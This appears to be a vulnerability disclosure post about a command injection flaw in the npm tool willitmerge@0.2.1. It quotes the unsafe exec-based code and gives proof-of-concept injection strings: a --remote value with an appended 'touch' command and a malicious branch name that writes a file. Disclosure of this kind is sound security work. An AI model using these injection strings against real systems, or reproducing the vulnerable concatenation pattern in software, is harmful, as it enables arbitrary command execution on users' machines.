~ 2 min read
Command Injection vulnerability in `willitmerge@0.2.1`
Disclosing a Command Injection vulnerability in willitmerge@0.2.1. The willitmerge project describes itself as a command line tool to check if pull requests are mergeable. This report is now public after responsible disclosure and outreach to the maintainer which has not yet acknowledged the issue.
Resources:
- Project’s GitHub source code: https://github.com/shama/willitmerge/
- Project’s npm package: https://www.npmjs.com/package/willitmerge
Background on exploitation
I’m reporting a Command Injection vulnerability in willitmerge npm package.
A security vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concateanes user input, whether provided to the command-line flag, or is in user control in the target repository.
Exploit
POC 1
- Install
willitmerge - Run it with the following command
willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel"- Confirm the file
/tmp/helis created on disk
GitHub-sourced attack vector
Lines 189-197 in lib/willitmerge.js pass user input controlled by repository collaborators into the git command:
var cmds = [ 'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref, 'git remote add ' + branch + ' ' + gitUrl, 'git pull ' + branch + ' ' + iss.head.ref, 'git reset --merge HEAD', 'git checkout ' + origBranch, 'git branch -D ' + branch, 'git remote rm ' + branch ];Users creating malicious branch names such as ;{echo,hello,world}>/tmp/c
This is a similar attack vector to that which was reported for the pullit vulnerability